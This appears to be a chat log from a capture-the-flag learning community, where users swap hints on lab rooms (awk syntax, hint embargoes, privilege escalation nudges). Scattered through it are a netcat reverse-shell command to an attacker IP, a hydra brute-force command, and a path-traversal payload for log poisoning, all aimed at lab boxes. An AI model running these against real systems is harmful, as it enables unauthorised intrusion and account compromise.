although trying to get a reverse shell using powershell i get nothing back, the server does something and a blank page appears. i've also tried running netcat directly on the machine and connecting to mine - this way i get a connection - however i'm not able to interact with anything
can you screenshot your actual connection attempt, what are you running and what messages if any do you get
this is what im getting when running netcat on the windows machine directly via rdp
however, if im trying to connect via the backdoor using one of many powershell oneliners or even netcat i get nothing back
but it's weird that i cant even interact with it while running netcat directly via rdp...
anybody knows a good resource to locate windows privesc exploits? For example for MS10-059 I am finding nothing but metasploit ...
and what are you using on the windows side?
to get the connection: nc.exe 10.14.7.87 443 -e cmd.exe or powershell.exe
that should work I think
yet it doesn't... i can even see on the windows powershell window what i type into my machine
but nothing happens, it's as if the shell isn't interactive
sorry, i don't know - perhaps try using msfvenom to make a windows x64 shell and use that?
np - it's just that the challenge is to gain a reverse shell using a webshell + powershell
i was just wondering if something is broken on my side or if it just doesn't work
well there must be something wrong, but I'm afraid I can't see it. afaik that should work
try to define the actual location of the powershell.exe file, I think if you don't use a file path it uses the current directory
well that would explain the behavior you're seeing, just echoing commands from one side to the other, with no shell spawned to pick them up and do anything with them
it's a new one on me though
ok I'm confused doesn't he need to upload a web shell then use powershell's version of the curl cmdlet to get the reverse connection?
still nothing
yes kinda, but the issue is that i cant even get a shell when doing it manually via RDP - let alone powershell via cmd in the webshell
just curious have you tried Invoke-WebRequest in powershell instead of nc.exe
I'm a beginner so just asking not suggesting
room is still under embargo
oh sorry
you are not the only one stuck in that room
I’ll give it a shot later. Im taking a break rn
not by a long shot I'm stuck tooo
I know the feeling partner
i was able to get it working; however not with the method they ask us to. i've uploaded a php backdoor and then made a reverse tcp shell using msfvenom and then executed it through the backdoor
@warm nest Not yet
ok need help has it been 72 hours since linux modules has been released
having trouble with task 6 question 2 i have a command that produces the correct output but is nowhere near the correct answer my ? is can someone point me to a resource that will explain the command the room author is looking for.
there are 2 options/flags/switches that are not needed for the command to work and I don't know how I would go about finding them
need a sanity check for Mnemonic. got the ||image file|| and have downloaded the ||mnemonic tool off of github|| but ive been looking absolutely everywhere and cannot seem to find any info to help me use this tool or even understand the decryption process. stuff on this is pretty barren on the internet. anyone have a resource they have that can help me understand this type of stenography or push me in the right direction?
nvm i think i figured it out
Need help with agent-sudo room, running hydra to crack ftp using rockyou. But its been 200 words and still the password hasn't been found. Do I need to wait, or am I doing something wrong?
200 words is not very much when you are trying to brute force something lol. I can confirm the password is in rockyou.txt . Keep going @shell crown
@shell crown It's actually between lines 200 and 300 if that helps
(assuming we are using the same version of rockyou.txt ...
Yeah. That's true. But this says its a ctf themed box. so I thought it would be in the first 100 words. I am on a very slow connection so it's taking a lot of time.
@shell crown It's not far after line 200 in rockyou, just checked
Yup. Got it
ok maybe i didnt figure it out what is the awk command for new line i know the \n part but what comes before that?
can anyone help me with this hydra syntax ?
hydra -l username -P log1.txt 10.10.10.10/animalmail http-post-form "/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1"
this is returning an error
ahh... figured it out
Good :). Add this to your bookmarks as it will def come in handy in the future: https://github.com/frizb/Hydra-Cheatsheet
thank you... i need to explain to my brain that i need to search for "tool -cheatsheet" for better results
To be honest if you look at it it's just a substitution cipher, if you've got the tool, you should have the list of what value translates to plaintext ||the import at the beginning is the name of the substitution key on Mnemonic github page. Those values are then further transformed using rgb values from the image, but....||. I just used an online tool to find the largest common factor of all the values in the cipher text and didn't use the Mnemonic script at all
Did you ever get help? I'm stuck as well.
Did you ever get the answer? Those extra 6 characters are killing me.
which VMs on THM are good for ejpt preparation
Hey can anyone provide me a hint on mission25 flag in room Linux Agency... I am kinda stuck
The room creator explained it either on here or the help. Simply if you read the hint, it says to put something first. || It's a blank one of those, so one of the 6 characters is a space||
hi, can someone help me on Enpass room? I already got the id_rsa and password
@severe jungle Please check the pins re: Enpass
can i dm you?
Not if its about Enpass.
alright sorry
It's only because it's a new room. Keep at it, and if you are still stuck tomorrow after 7pm, Then you are welcome to ask for help
Permission denied (publickey) error for ssh in enpass room is normal or i am doing wrong?
neither confirm nor deny, room is under embargo until tomorrow evening GMT
@still dust Please see the Pins in this channel
Yeah read the hint and think of a bash one-liner, separating commands with semicolon
read up on ssh and then you will know what is wrong
Hi everyone,
I'm stuck at the privilege escalation to root in "Sustah" room
Any small hint?
Linpeas didn't spot anything interesting
did for me
my friend told me as you said too
||[+] Checking doas.conf
permit nopass kiran as root cmd rsync||
||/etc/doas.conf: No such file or directory||
is it meant to be there?
yes I googled that
hmm, that's odd
try the command
if that doesn't work, then terminate and redeploy the box and try again
if that still doesn't work then #room-bugs
Thanks ❤️
unless the room changed that was the intended path
it is not a bug. The conf file is in different location.
anyone?
dm
still need help on linux modules task 6 ?1 how do I insert a new line in awk I know the /n but what comes before the /n
Do you still need help @magic bone ?
Hi Guys and Gals, I'm currently working through the room Internal on the offensive learning path and ive hit a dead end i have managed to || get a reverse shell through word press, i've run Linpeas and linenum and found DB creds for phpmyadmin, i (think) i have dumped what i can from the DB and found a sha256 token that i can't crack and a hash containing the WP password. || im still pretty new to this and can assume i have missed something in the || linpeas/linenum results|| I have made a promise to myself to try not to use the write ups so if someone could give me a little nudge in the right direction for gaining user access i'd be really grateful. Happy hunting
db creds don't seem to be helpful
keep sniffing around the filesystem
you got a reverse shell, this is good
ok thanks
@ripe hedge thank you! i have tried the usual ||/var/backups and checking to see if i can write/read to passwd or shadow|| i will go back to the drawing board (or filesystem) and keep digging
good hunting
you changed it , right?
||because it was in the default location in the writeups||
was default when I did it
Can someone help me with hydra in #room-help pls
still? I dont think anyone provided me with the hint? if someone did i guess i missed it
yeah I told you to dm me haha
Please don't do that. Just ask and wait.
@ripe hedge got it! thank you
@bronze fox Your home dir is not /home
/home is the home dir but not your home dir
awesome
You don't need a /n the records are already on new lines
great help thanks @stuck fractal
@ripe hedge and root! 3 days (with work inbetween) it def earned the red level!
gj
@ripe hedge thanks :D, felt like a proper achievement. ive moved on to the buffer overflow section, the first room states its not to teach you the basics but for OSCP prep - do you have any recommendations on rooms for complete beginners with buffer overflow?
there's binex
https://tryhackme.com/room/bof1 this one too
cheers, they will be my next ones before continuing the path π
https://tryhackme.com/room/introtox8664 this is a pre-req
so in this order would be best? intro to x86-64 > bof1 > binex
bof1 is still really hard for a first BOF, I paradoxically found the OSCP prep much easier, maybe because you have tools that almost make all the work for you? For bof1 you'll have to write a bit of c or asm. Also you might want to check the computerphile video on the subject, I didn't find better explanation (for me) @pulsar flame
@pale pasture Cheers!! i'll check out the vid now. was just about to start https://tryhackme.com/room/introtox8664
Do not provide or ask for help or hints for both Investigating Windows 2.0/3.x rooms until 15th Feb, 7pm (GMT)
Can I ask hints for enpass now??
Guys it says the 13th in pins
It's 13th today right
12th
Ohk
It's the 12th @ 9pm rn
true, didnt see, soz
Are we allowed to ask for Enpass ?
Nope
How did you do it? im missing the hyphens in the command ||awk 'BEGIN{---- -- OFS=":"} {print $1,$4}' awk.txt|| (used hyphens because using asterisks bolds the text. I already have the "correct" output
it's not a new line it's actually a space so you need to use ||FS" "; OFS=|| credit to @lament forge for figuring that out
Thanks!! ofc! how did I not see it lol
u were close , just think what u want to change, and what are you gonna replace
can i get some sort of hint . whats the encryption here
Room, task, question?
@stuck fractal golden eye , task 1 , 4th quest
It's not encryption, do you want a hint or just the type of encoding?
The type of Encoding !
oh this uh , smh . THANKS
no not yet i moved to the next task till i find something
There is a cunningly named 'Buffer Overflow' box that precedes the OSCP Prep one. The hardest part of the OSCP prep box is getting going on it, tbh. By the time you've gone through it for the 10th time you'll be flying. It's a grind, but worth it to get the concept fixed in your head.
ran into the same problem
haha I gave hint not very long ago, look for messages from me
uggh semi colon.....
this is why I use python
Do not provide or ask for help or hints for Inferno room until 15th Feb, 7pm (GMT)
Good evening. I did ask this in the room-help channel but maybe it is better to ask it here. I'm doing Overpass 3 and I'm on PE for the second user. I've seen the vulnerability, but for some reason i can't mount the <thing> since i am getting an error: mount.nfs: requested NFS version or transport protocol is not supported. I can't also get the showmount -e to work since I am also getting an error: clnt_create: RPC: Program not registered.
Did anyone experience this? Is it something on the machine or the way I am doing the tunnel?
It's ||NFSv4|| so you don't need showmount
IDK how you're trying to mount it, but the fact above tells you more about how to mount it
Also, if you asked in #room-help then I'd recommend checking the writeups. That channel requires you to have checked the writeups first.
Well i did see the path in the enumeration, the showmount was to make sure i could access the mount points, but i keep getting the version or transport protocol not supported. Maybe i need an extra flag in order to restrict tcp traffic or set the version to 4. Regarding the #room-help, i've deleted the request
showmount uses RPC
v4 doesn't use RPC at all
If you haven't forwarded RPC too, showmount won't work
maybe i am not setting the forwarding correctly, gonna check it out again (and drop the showmount)
thank you vm
I experienced the same problem I think it has something to do with the way you forward the port that the remote share is listening on ?
my issue was resolved by switching from my desktop to my laptop "i don't know why or how"
anybody working on Inferno?
This part right here ----> The machine is designed to be real-life and is perfect for newbies starting out in penetration testing
really?
My bad! lol... Can I now?
Room: Physical Security Intro , section: hardware bypassing, ques: What item can be used to widen the gaps between doors and door frames or between double doors to allow for other bypass tools to be used? This tool is also common for automobile entry. I didn't find any relevant answer anyone who have done this need your help. #room-help
Guys Can anyone help me with Priv Esc...I got the username and got into the shell but idk how to get to root in Enpass Room....Can anyone suggest me something? or any room that i need to go through first
sorry to disturb you guys i am working on Binex machine a Bof machine
and i need a little help. I successfully find out the offset
also return address but the i don't know what wrong
Yeah sure
Boommm!!!!! Binex is done.
Congrats
En-pass-ed ❤️
Any help appreciated to better understand the task #28 on https://tryhackme.com/room/investigatingwindows3 I don't understand the following question
What is the name of the last module within this event which had a successful result?
Well in my case i fixed it by just mapping root instead of the path defined in the exports.
You'll have to wait. Read the pins on room hint/help embargoes.
Hey would be nice if someone could hint me about task 6 = awk
in room linuxmodules
I try with :
awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt
but seems it is not the right answer there
Hey could you give me a hint, I stuck at the same place
sure, if you look for messages from me I already gave the hint bud
@ruby cloud you mean "reading the manpage of awk and the tutorials the creator links in the exercise" ?
Did you read the hint? I told you to use FS too.
I want to demonstrate the use of multiple attributes/variables in one PATTERN Block
So you gotta use a field separator(FS) too within the BEGIN{} pattern.
Now if you read the use of FS in the given text. You can figure out how to use it.
Append: FS=" " to the pattern
Yes I did, but I dont get it
OK I made it, thanks
but in terminal these answer gives me an error:
||awk 'BEGIN{FS="n" OFS=":"} {print $1,$4}' awk.txt
awk: cmd. line:1: BEGIN{FS="n" OFS=":"} {print $1,$4}
awk: cmd. line:1: ^ syntax error||
why the n?
to end line when numbers are present ??
Yes why n? If you put FS="n" it will separate the passed in input using the 'n' as a delimiter. We want to divide the words. and hence we use " " (a space)
^
||awk 'BEGIN{FS=" " OFS=":"} {print $1,$4}' awk.txt
awk: cmd. line:1: BEGIN{FS=" " OFS=":"} {print $1,$4}
awk: cmd. line:1: ^ syntax error||
gives an error too
Also, separate those attributes using a semicolon(;) FS=" "; OFS=":"
ok now It works
yeah that part threw me off for a while
kind a hard part
but when I read sed part I think I need a break
good room mate
thanx ❤️
Well you aren't supposed to do all those tasks in one day... Take your time... Those are tools vast with their documentation and usage, I included a really small part. Just take it slow, and if you find any difficulty feel free to ping me...
I m solving overpass and found an admin panel but couldn't do much. A small nudge would be highly appreciated!
If you have access then you should see something obvious
If you don't have access, you're gonna wanna gain access
yeah i am trying for ||sqli||
||broken authentication||?
Try things and see what happens
tried but no luck. Will try something else
Any hints on en-pass Room?
Not yet, 2 hours and 25 mins and the embargo will be over
HI guys, I'm a bit new here and I'm stuck on a challenge that i may need some advise one
It's always best to just ask the question directly
We don't know what you need help with until you ask
for Network Services 2 exploiting NFS when i try to run the bash file it results a: ./bash: line 7: syntax error near unexpected token newline' ./bash: line 7: <!DOCTYPE html>'
sorry about that, forgot to hit enter...
You downloaded the web page, rather than the binary
I'm working on investigatingwindows, can't seem to find the command and control server IP. I've answered every other question, so I must be missing something obvious
figured it out, needed to check the place used to poison DNS
Can I get a hint for Intro to Python Room Task 12 ?
Am I supposed to automate a script to decode the strings 15 times
If so, it sounds like fun
hey guys im on task2 archangel trying to get RCE via ||access logs|| im just having a bit of trouble.. anyone have any idea why the ||access.log|| isnt showing up? this is my payload ||view=/var/www/html/development_testing/./.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../var/log/apache2/access.log||
can access other resources with this payload fine
Certain payloads break the file, reset the machine is probably your best bet
alrighty thanks so i assume thats the right direction then
Very much so, keep at it!
appreciate the help
So now that we're allowed, can I get a hint on where to look for the user on enpass?
I am at an impasse
Try to bypass at a certain place
Using headers?
Err
Methods sorry
The ||fake 403|| looks suspicious but I can figure out why yet
You need to || bypass that 403.php with a character, tiny bit like LFI||
wow....seriously >.<
Yep
Lol. Lordy
Once you have foothold it's pretty simple from there
someone can put me on the right way about privs elevate on enpass?
im stuck
Im trying SETUID
exploit kernel
some help?
||check a certain directory||
Guys for the En-Pass room I found eveything except a ||user name||, can i get some hints please
||Try to bypass 403.php||
@simple mountain enpass embargo up btw
Hmm i wonder why my gobuster scan didn't pick it up, btw thanks for the help
Ah, Merci
You probably didn't specify it to ||add .php on the end||
actually i did
Oh strange i don't then
because its not a directory what are u looking for...
hmm
yeah ok. worst part is I had tried that but it didn't work
Yea it's kind of a weird one tbh
||you only need one part of the LFI and have a character on the end of it||
is it ||Null||?
No
I had missed another character but now I broke the box...
a thing I need got chpwned
ok that was a strange box
Yea I had to google for it as well
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
@shut pollen It's pinned. It's still under embargo
What's embargo ? Sorry I don't know that.
You are NOT allowed to ask for help or hints for 72 hours after the room releases
Okay sorry 
I was totally lost before hints >.>
I never knew it was a thing
Is this for a room?
@warped sinew Please don't spoil possible exploits for rooms that are under embargo
@stuck fractal Understood
Hi everyone! I'm another person stuck on user on En-pass. I've read the hints above, but I'm still struggling. ||I've tried bypassing 403.php by typing things like ../../../../../etc/passwd or http://ip:8001/./403.php.|| Is there anything I can read about that might get me on the right track?
You're on the right track
Thank you!
For en-pass I created custom wordlist with the potential usernames(sau, cimihan, sadman) i got and then got ssh user via username enumeration(openssh exploit). Is this not even a thing then? I din look much on 403.php tho
I used ||"awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt"|| in task 2 of awk section in Linux Modules. And it displayed the desired answer. Only thing is that the task requires something else. What am I missing?
a space between the lines
Got it. Thanks.
anybody available for a hint on enpass stuck at root flag I've uploaded linpeas and ran it didn't find anything useful what should i be looking for
@pure thistle Manually browse some directories
Check the || /opt || directory
If you're really really stuck (like I was with that damn 403 page) - there's now a write-up that exists somewhere out there...
thanks guys but its getting late may try again tomorrow
hello everyone. Did some of you complete room Keldagrim Forge?
